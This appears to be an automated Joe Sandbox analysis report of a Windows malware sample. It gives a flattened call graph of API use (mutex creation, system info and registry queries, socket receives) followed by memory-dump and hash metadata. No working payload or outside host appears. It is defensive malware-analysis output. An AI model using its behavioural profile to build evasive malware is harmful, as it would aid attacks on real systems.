11976->11977 11978 f4a4be shared_ptr 11976->11978 11979 f4a4a6 11977->11979 11978->11971 11979->11971 11981 f47211 11980->11981 11988 f33970 11981->11988 11983 f47446 std::invalid_argument::invalid_argument 11983->11976 11984 f472ad __cftof 11984->11983 11985 f4c68b __Mtx_init_in_situ 2 API calls 11984->11985 11986 f47401 11985->11986 11993 f32ec0 11986->11993 11989 f4c68b __Mtx_init_in_situ 2 API calls 11988->11989 11990 f339a7 11989->11990 11991 f4c68b __Mtx_init_in_situ 2 API calls 11990->11991 11992 f339e6 11991->11992 11992->11984 11994 f32f06 11993->11994 11995 f32f7e GetCurrentThreadId 11993->11995 11998 f4c6ac GetSystemTimePreciseAsFileTime 11994->11998 11996 f32fef 11995->11996 11997 f32f94 11995->11997 11996->11983 11997->11996 12003 f4c6ac GetSystemTimePreciseAsFileTime 11997->12003 11999 f32f12 11998->11999 12000 f3301e 11999->12000 12006 f32f1d __Mtx_unlock 11999->12006 12001 f4c26a 5 API calls 12000->12001 12002 f33024 12001->12002 12004 f4c26a 5 API calls 12002->12004 12005 f32fb9 12003->12005 12004->12005 12008 f4c26a 5 API calls 12005->12008 12009 f32fc0 __Mtx_unlock 12005->12009 12006->12002 12007 f32f6f 12006->12007 12007->11995 12007->11996 12008->12009 12010 f4c26a 5 API calls 12009->12010 12011 f32fd8 __Cnd_broadcast 12009->12011 12010->12011 12011->11996 12012 f4c26a 5 API calls 12011->12012 12013 f3303c 12012->12013 12014 f4c6ac GetSystemTimePreciseAsFileTime 12013->12014 12022 f33080 shared_ptr __Mtx_unlock 12014->12022 12015 f331c5 12016 f4c26a 5 API calls 12015->12016 12017 f331cb 12016->12017 12018 f4c26a 5 API calls 12017->12018 12019 f331d1 12018->12019 12020 f4c26a 5 API calls 12019->12020 12028 f33193 __Mtx_unlock 12020->12028 12021 f331a7 std::invalid_argument::invalid_argument 12021->11983 12022->12015 12022->12017 12022->12021 12024 f33132 GetCurrentThreadId 12022->12024 12023 f4c26a 5 API calls 12025 f331dd 12023->12025 12024->12021 12026 f3313b 12024->12026 12026->12021 12027 f4c6ac GetSystemTimePreciseAsFileTime 12026->12027 12029 f3315f 12027->12029 12028->12021 12028->12023 12029->12015 12029->12019 12029->12028 12030 f4bd4c GetSystemTimePreciseAsFileTime 12029->12030 12030->12029 11482 f3a856 11483 f3a870 11482->11483 11484 f3a892 shared_ptr 11482->11484 11483->11484 11486 f3a94e 11483->11486 11489 f3a8a0 11484->11489 11498 f37d30 11484->11498 11488 f3a953 Sleep CreateMutexA 11486->11488 11487 f3a8ae 11487->11489 11490 f37d30 7 API calls 11487->11490 11491 f3a98e 11488->11491 11492 f3a8b8 11490->11492 11492->11489 11493 f37d30 7 API calls 11492->11493 11494 f3a8c2 11493->11494 11494->11489 11495 f37d30 7 API calls 11494->11495 11496 f3a8cc 11495->11496 11496->11489 11497 f37d30 7 API calls 11496->11497 11497->11489 11499 f37d96 __cftof 11498->11499 11518 f37ee8 shared_ptr std::invalid_argument::invalid_argument 11499->11518 11537 f35c10 11499->11537 11501 f37dd2 11502 f35c10 6 API calls 11501->11502 11504 f37dff shared_ptr 11502->11504 11503 f37ed3 GetNativeSystemInfo 11505 f37ed7 11503->11505 11504->11503 11504->11505 11504->11518 11506 f38019 11505->11506 11507 f37f3f 11505->11507 11505->11518 11508 f35c10 6 API calls 11506->11508 11509 f35c10 6 API calls 11507->11509 11510 f3804c 11508->11510 11511 f37f67 11509->11511 11513 f35c10 6 API calls 11510->11513 11512 f35c10 6 API calls 11511->11512 11514 f37f86 11512->11514 11515 f3806b 11513->11515 11547 f68bbe 11514->11547 11517 f35c10 6 API calls 11515->11517 11519 f380a3 11517->11519 11518->11487 11520 f35c10 6 API calls 11519->11520 11521 f380f4 11520->11521 11522 f35c10 6 API calls 11521->11522 11523 f38113 11522->11523 11524 f35c10 6 API calls 11523->11524 11525 f3814b 11524->11525 11526 f35c10 6 API calls 11525->11526 11527 f3819c 11526->11527 11528 f35c10 6 API calls 11527->11528 11529 f381bb 11528->11529 11530 f35c10 6 API calls 11529->11530 11531 f381f3 11530->11531 11532 f35c10 6 API calls 11531->11532 11533 f38244 11532->11533 11534 f35c10 6 API calls 11533->11534 11535 f38263 11534->11535 11536 f35c10 6 API calls 11535->11536 11536->11518 11538 f35c54 11537->11538 11550 f34b30 11538->11550 11540 f35d17 shared_ptr std::invalid_argument::invalid_argument 11540->11501 11541 f35c7b __cftof 11541->11540 11542 f35da7 RegOpenKeyExA 11541->11542 11543 f35e00 RegCloseKey 11542->11543 11545 f35e26 11543->11545 11544 f35ea6 shared_ptr std::invalid_argument::invalid_argument 11544->11501 11545->11544 11546 f35c10 4 API calls 11545->11546 11578 f68868 11547->11578 11549 f68bdc 11549->11518 11552 f34ce5 11550->11552 11553 f34b92 11550->11553 11552->11541 11553->11552 11554 f66da6 11553->11554 11555 f66db4 11554->11555 11556 f66dc2 __fassign 11554->11556 11559 f66d19 11555->11559 11556->11553 11560 f6690a __fassign 4 API calls 11559->11560 11561 f66d2c 11560->11561 11564 f66d52 11561->11564 11563 f66d3d 11563->11553 11565 f66d8f 11564->11565 11566 f66d5f 11564->11566 11568 f6b67d 4 API calls 11565->11568 11567 f66d6e __fassign 11566->11567 11570 f6b6a1 11566->11570 11567->11563 11568->11567 11571 f6690a __fassign 4 API calls 11570->11571 11572 f6b6be 11571->11572 11574 f6b6ce std::invalid_argument::invalid_argument 11572->11574 11575 f6f1bf 11572->11575 11574->11567 11576 f6690a __fassign 4 API calls 11575->11576 11577 f6f1df __cftof __fassign __freea std::invalid_argument::invalid_argument 11576->11577 11577->11574 11579 f6887a 11578->11579 11580 f6690a __fassign 4 API calls 11579->11580 11583 f6888f ___std_exception_copy 11579->11583 11582 f688bf 11580->11582 11581 f66d52 4 API calls 11581->11582 11582->11581 11582->11583 11583->11549 12307 f4d111 12308 f4d122 12307->12308 12310 f4d12a 12308->12310 12311 f4d199 12308->12311 12312 f4d1a7 SleepConditionVariableCS 12311->12312 12314 f4d1c0 12311->12314 12312->12314 12314->12308 12142 f3215a 12143 f4c6fc InitializeCriticalSectionEx 12142->12143 12144 f32164 12143->12144 12116 f33f9f 12117 f33fb6 12116->12117 12118 f33fad 12116->12118 12119 f32410 5 API calls 12118->12119 12119->12117 11591 f39adc 11594 f39aea shared_ptr 11591->11594 11592 f3a917 11593 f3a953 Sleep CreateMutexA 11592->11593 11595 f3a98e 11593->11595 11594->11592 11596 f39b4b shared_ptr 11594->11596 11597 f39b59 11596->11597 11598 f35c10 6 API calls 11596->11598 11599 f39b7c 11598->11599 11606 f38b30 11599->11606 11601 f39b8d 11602 f35c10 6 API calls 11601->11602 11603 f39cb1 11602->11603 11604 f38b30 6 API calls 11603->11604 11605 f39cc2 11604->11605 11607 f38b7c 11606->11607 11608 f35c10 6 API calls 11607->11608 11609 f38b97 shared_ptr std::invalid_argument::invalid_argument 11608->11609 11609->11601 11830 f66a44 11831 f66a52 11830->11831 11832 f66a5c 11830->11832 11835 f6698d 11832->11835 11834 f66a76 ___free_lconv_mon 11836 f6690a __fassign 4 API calls 11835->11836 11837 f6699f 11836->11837 11837->11834 11343 f38780 11344 f38786 11343->11344 11350 f66729 11344->11350 11347 f387a6 11349 f387a0 11357 f66672 11350->11357 11352 f38793 11352->11347 11353 f667b7 11352->11353 11354 f667c3 __fassign 11353->11354 11356 f667cd ___std_exception_copy 11354->11356 11373 f66740 11354->11373 11356->11349 11359 f6667e __fassign 11357->11359 11358 f66685 ___std_exception_copy 11358->11352 11359->11358 11361 f6a8c3 11359->11361 11362 f6a8cf __fassign 11361->11362 11365 f6a967 11362->11365 11364 f6a8ea 11364->11358 11368 f6a98a 11365->11368 11367 f6a9d0 ___free_lconv_mon 11367->11364 11368->11367 11368->11368 11369 f6d82f 11368->11369 11372 f6d83c __fassign 11369->11372 11370 f6d867 RtlAllocateHeap 11371 f6d87a 11370->11371 11370->11372 11371->11367 11372->11370 11372->11371 11374 f66762 11373->11374 11376 f6674d ___std_exception_copy ___free_lconv_mon 11373->11376 11374->11376 11377 f6a038 11374->11377 11376->11356 11378 f6a050 11377->11378 11380 f6a075 11377->11380 11378->11380 11381 f70439 11378->11381 11380->11376 11382 f70445 __fassign 11381->11382 11384 f7044d __dosmaperr ___std_exception_copy 11382->11384 11385 f7052b 11382->11385 11384->11380 11386 f7054d 11385->11386 11390 f70551 __dosmaperr ___std_exception_copy 11385->11390 11386->11390 11391 f700d2 11386->11391 11390->11384 11393 f700e3 11391->11393 11392 f70106 11392->11390 11395 f6fcc0 11392->11395 11393->11392 11402 f6a671 11393->11402 11396 f6fd0d 11395->11396 11440 f6690a 11396->11440 11399 f6ffbc std::invalid_argument::invalid_argument 11399->11390 11400 f6fd1c __cftof __fassign 11400->11399 11401 f6c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 11400->11401 11448 f6b67d 11400->11448 11401->11400 11403 f6a67b __fassign 11402->11403 11404 f6d82f __fassign RtlAllocateHeap 11403->11404 11407 f6a694 __fassign ___free_lconv_mon 11403->11407 11404->11407 11405 f6a722 11405->11392 11407->11405 11409 f68bec 11407->11409 11410 f68bf1 __fassign 11409->11410 11413 f68bfc __fassign 11410->11413 11415 f6d634 11410->11415 11429 f665ed 11413->11429 11416 f6d640 __fassign 11415->11416 11417 f6d69c ___std_exception_copy 11416->11417 11418 f6d726 11416->11418 11419 f6d81b __fassign 11416->11419 11421 f6d751 __fassign 11416->11421 11417->11413 11418->11421 11432 f6d62b 11418->11432 11420 f665ed __fassign 3 API calls 11419->11420 11423 f6d82e 11420->11423 11421->11417 11425 f6a671 __fassign 4 API calls 11421->11425 11427 f6d7a5 11421->11427 11425->11427 11426 f6d62b __fassign 4 API calls 11426->11421 11427->11417 11428 f6a671 __fassign 4 API calls 11427->11428 11428->11417 11435 f664c7 11429->11435 11433 f6a671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11432->11433 11434 f6d630 11433->11434 11434->11426 11436 f664d5 __fassign 11435->11436 11437 f66520 11436->11437 11438 f6652b __fassign GetPEB ExitProcess GetPEB 11436->11438 11439 f6652a 11438->11439 11441 f6692a 11440->11441 11442 f66921 11440->11442 11441->11442 11443 f6a671 __fassign 4 API calls 11441->11443 11442->11400 11444 f6694a 11443->11444 11453 f6b5fb 11444->11453 11449 f6a671 __fassign 4 API calls 11448->11449 11450 f6b688 11449->11450 11451 f6b5fb __fassign 4 API calls 11450->11451 11452 f6b698 11451->11452 11452->11400 11454 f66960 11453->11454 11455 f6b60e 11453->11455 11457 f6b628 11454->11457 11455->11454 11461 f6f5ab 11455->11461 11458 f6b63b 11457->11458 11460 f6b650 11457->11460 11458->11460 11468 f6e6b1 11458->11468 11460->11442 11462 f6f5b7 __fassign 11461->11462 11463 f6a671 __fassign 4 API calls 11462->11463 11465 f6f5c0 __fassign 11463->11465 11464 f6f606 11464->11454 11465->11464 11466 f68bec __fassign 4 API calls 11465->11466 11467 f6f62b 11466->11467 11469 f6a671 __fassign 4 API calls 11468->11469 11470 f6e6bb 11469->11470 11473 f6e5c9 11470->11473 11472 f6e6c1 11472->11460 11477 f6e5d5 __fassign ___free_lconv_mon 11473->11477 11474 f6e5f6 11474->11472 11475 f68bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11476 f6e668 11475->11476 11478 f6e6a4 11476->11478 11479 f6a72e __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11476->11479 11477->11474 11477->11475 11478->11472 11480 f6e695 11479->11480 11481 f6e4b0 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11480->11481 11481->11478 11610 f320c0 11613 f4c68b 11610->11613 11612 f320cc 11616 f4c3d5 11613->11616 11615 f4c69b 11615->11612 11617 f4c3e1 11616->11617 11618 f4c3eb 11616->11618 11619 f4c3be 11617->11619 11620 f4c39e 11617->11620 11618->11615 11629 f4cd0a 11619->11629 11620->11618 11625 f4ccd5 11620->11625 11623 f4c3d0 11623->11615 11626 f4cce3 InitializeCriticalSectionEx 11625->11626 11627 f4c3b7 11625->11627 11626->11627 11627->11615 11630 f4cd1f RtlInitializeConditionVariable 11629->11630 11630->11623 11631 f3e0c0 recv 11632 f3e122 recv 11631->11632 11633 f3e157 recv 11632->11633 11634 f3e191 11633->11634 11635 f3e2b3 std::invalid_argument::invalid_argument 11634->11635 11640 f4c6ac 11634->11640 11647 f4c452 11640->11647 11642 f3e2ee 11643 f4c26a 11642->11643 11644 f4c292 11643->11644 11645 f4c274 11643->11645 11644->11644 11645->11644 11664 f4c297 11645->11664 11648 f4c4a8 11647->11648 11650 f4c47a std::invalid_argument::invalid_argument 11647->11650 11648->11650 11653 f4cf6b 11648->11653 11650->11642 11651 f4c4fd __Xtime_diff_to_millis2 11651->11650 11652 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 11651->11652 11652->11651 11654 f4cf7a 11653->11654 11656 f4cf87 __aulldvrm 11653->11656 11654->11656 11657 f4cf44 11654->11657 11656->11651 11660 f4cbea 11657->11660 11661 f4cbfb GetSystemTimePreciseAsFileTime 11660->11661 11663 f4cc07 11660->11663 11661->11663 11663->11656 11667 f32ae0 11664->11667 11666 f4c2ae Concurrency::cancel_current_task 11675 f4bedf 11667->11675 11669 f32aff 11669->11666 11670 f32af4 __fassign 11670->11669 11671 f6a671 __fassign 4 API calls 11670->11671 11672 f66ccc 11671->11672 11673 f68bec __fassign 4 API calls 11672->11673 11674 f66cf6 11673->11674 11678 f4cc31 11675->11678 11679 f4cc3f InitOnceExecuteOnce 11678->11679 11681 f4bef2 11678->11681 11679->11681 11681->11670 11682 f4d0c7 11683 f4d0d6 11682->11683 11684 f4d17f 11683->11684 11685 f4d17b RtlWakeAllConditionVariable 11683->11685 11850 f32e00 11851 f32e28 11850->11851 11852 f4c68b __Mtx_init_in_situ 2 API calls 11851->11852 11853 f32e33 11852->11853 12120 f38980 12122 f38aea 12120->12122 12123 f389d8 shared_ptr 12120->12123 12121 f35c10 6 API calls 12121->12123 12123->12121 12123->12122 11838 f33c47 11839 f33c51 11838->11839 11841 f332d0 6 API calls 11839->11841 11842 f33c5f 11839->11842 11840 f33c68 11841->11842 11842->11840 11843 f33810 4 API calls 11842->11843 11844 f33cdb 11843->11844 12145 f39f44 12146 f39f4c shared_ptr 12145->12146 12147 f3a953 Sleep CreateMutexA 12146->12147 12149 f3a01f shared_ptr 12146->12149 12148 f3a98e 12147->12148 11768 f33c8e 11769 f33c98 11768->11769 11770 f33ca5 11769->11770 11776 f32410 11769->11776 11772 f33ccf 11770->11772 11773 f33810 4 API calls 11770->11773 11774 f33810 4 API calls 11772->11774 11773->11772 11775 f33cdb 11774->11775 11777 f32424 11776->11777 11780 f4b52d 11777->11780 11788 f63aed 11780->11788 11783 f4b5a5 ___std_exception_copy 11795 f4b1ad 11783->11795 11784 f4b598 11791 f4af56 11784->11791 11787 f3242a 11787->11770 11799 f64f29 11788->11799 11790 f4b555 11790->11783 11790->11784 11790->11787 11792 f4af9f ___std_exception_copy 11791->11792 11794 f4afb2 shared_ptr 11792->11794 11805 f4b39f 11792->11805 11794->11787 11796 f4b1d8 11795->11796 11798 f4b1e1 shared_ptr 11795->11798 11797 f4b39f 5 API calls 11796->11797 11797->11798 11798->11787 11800 f64f2e __fassign 11799->11800 11800->11790 11801 f6d634 __fassign 4 API calls 11800->11801 11804 f68bfc __fassign 11800->11804 11801->11804 11802 f665ed __fassign 3 API calls 11803 f68c2f 11802->11803 11804->11802 11806 f4bedf InitOnceExecuteOnce 11805->11806 11807 f4b3e1 11806->11807 11808 f4b3e8 11807->11808 11816 f66cbb 11807->11816 11808->11794 11817 f66cc7 __fassign 11816->11817 11818 f6a671 __fassign 4 API calls 11817->11818 11821 f66ccc 11818->11821 11819 f68bec __fassign 4 API calls 11820 f66cf6 11819->11820 11821->11819

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00F6652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00F6652A,?,?,?,?,?,00F67661), ref: 00F66567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: c0168005880711dbaa5937da0ff8854b4716f04ba86bdcfaf1fbefb0b154350f
                                                                                                                                                                                                                                                  • Instruction ID: 2417484c3506ba1349d288c1bf704be51159cbf6ca79fb765c3fb8add86bf841
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0168005880711dbaa5937da0ff8854b4716f04ba86bdcfaf1fbefb0b154350f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E08630141108AFCF357B18DC5FD8D3B59EB62751F540800F81986221CB29DD41E990
                                                                                                                                                                                                                                                  Function 05070B43 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1762326460.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5070000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8709111e6029549d1552f671e1b80e8d3c2f0370bc6055455a32afddb166140a
                                                                                                                                                                                                                                                  • Instruction ID: 15b0802a237fe9d9aa3ea08f13840ba356753cf58f4d23c163b26a0650da2c4d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8709111e6029549d1552f671e1b80e8d3c2f0370bc6055455a32afddb166140a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C017BEBD0D04CAD6142C6613B7D9BE3B5AF5D2339330466AF043C8002D54A478E8C39
                                                                                                                                                                                                                                                  Function 00F35C10 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 434COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
